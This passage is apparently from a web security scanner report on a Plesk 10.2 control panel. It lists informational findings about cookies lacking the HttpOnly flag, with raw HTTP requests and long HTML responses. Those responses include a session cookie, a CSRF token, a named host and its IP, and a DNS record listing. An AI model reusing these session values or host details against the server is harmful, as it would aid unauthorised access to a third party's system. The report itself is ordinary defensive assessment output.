onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all DNS records.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);DNSZoneListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>11 DNS records total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="host"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="DNSZoneListSelectAll" value="true" onClick="DNSZoneListSelect()"></th><th width="40%" class="sort"><A href="#" onClick="DNSZoneListSort(&#039;host_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort DNS zone records by host.&quot;&#125;]);" onMouseOut="tooltip.hide();">Host</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="20%"><A href="#" onClick="DNSZoneListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort DNS zone records by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">Record type</a></th><th width="40%"><A href="#" onClick="DNSZoneListSort(&#039;val&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort DNS zone records by value.&quot;&#125;]);" onMouseOut="tooltip.hide();">Value</a></th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_11" value="11" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@11/properties/" onClick=";lon();">50.23.106.58 / 24</a></td><td>PTR</td><td>vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_10" value="10" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@10/properties/" onClick=";lon();">ftp.vulnerable.host.fqdn.</a></td><td>CNAME</td><td>vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_9" value="9" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@9/properties/" onClick=";lon();">ipv4.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_8" value="8" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@8/properties/" onClick=";lon();">mail.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6" value="6" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@6/properties/" onClick=";lon();">mssql.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2" value="2" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@2/properties/" onClick=";lon();">vulnerable.host.fqdn.</a></td><td>NS</td><td>ns.vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_4" value="4" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@4/properties/" onClick=";lon();">vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7" value="7" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@7/properties/" onClick=";lon();">vulnerable.host.fqdn.</a></td><td>MX (10)</td><td>mail.vulnerable.host.fqdn.</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3" value="3" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@3/properties/" onClick=";lon();">ns.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_16" value="16" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@16/properties/" onClick=";lon();">webmail.vulnerable.host.fqdn.</a></td><td>A</td><td>50.23.106.58</td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_15" value="15" onClick="DNSZoneListSelectOnChange(this);"></td><td><A href="/plesk/client@2/domain@1/dns/resource-record@15/properties/" onClick=";lon();">www.vulnerable.host.fqdn.</a></td><td>CNAME</td><td>vulnerable.host.fqdn.</td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>11 DNS records total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DNSZoneListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("dnszonelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Imhvc3QiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function DNSZoneListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DNSZoneListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DNSZoneListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DNSZoneListSelectAll.checked;
                           DNSZoneListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DNSZoneListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DNSZoneListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   DNSZoneListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DNSZoneListSearchShow()
           {
               var sc = document.getElementById("DNSZoneListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DNSZoneListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DNSZoneListSearchHide()
           {
               var sc = document.getElementById("DNSZoneListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DNSZoneListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DNSZoneListRemove(f)
           {
               if (0 == DNSZoneListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/dns/resource-record@multi/delete/";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.20. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/domain-alias@  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/domain-alias@

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/domain-alias@ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:20 GMT
Connection: close
Content-Length: 15736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fdomain-alias%2540%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fdomain-aliases%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Domain aliases</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/domain_aliases/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/domain-alias@" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <SPAN class="commonButton" id="bid-domain-alias-add-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Permission denied.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_domain_alias_add" disabled id="buttonid-domain-alias-add-disabled" type="button">Add Domain Alias</BUTTON><SPAN id="spanid-domain-alias-add-disabled">Add Domain Alias</SPAN></SPAN>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">

<fieldset>

<legend>Domain aliases</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>


           <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Domain alias is enabled."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"Domain alias is disabled."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"Domain alias is disabled because the domain is turned off."}]); }

           function z() { tooltip.hide(); }
           </script>
       <div class="paging pagingTop noList">No Domain aliases</div><div class="paging pagingBottom noList"></div><script>SetCookie("domainaliaseslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function DomainAliasesListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DomainAliasesListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DomainAliasesListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DomainAliasesListSelectAll.checked;
                           DomainAliasesListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DomainAliasesListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DomainAliasesListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   DomainAliasesListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainAliasesListSearchShow()
           {
               var sc = document.getElementById("DomainAliasesListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DomainAliasesListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DomainAliasesListSearchHide()
           {
               var sc = document.getElementById("DomainAliasesListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DomainAliasesListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DomainAliasesListRemove(f)
           {
               if (0 == DomainAliasesListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/domains/domain_aliases_remove.php";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.21. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/aspdotnet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/aspdotnet/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/aspdotnet/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:26 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:28 GMT
Connection: close
Content-Length: 46372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
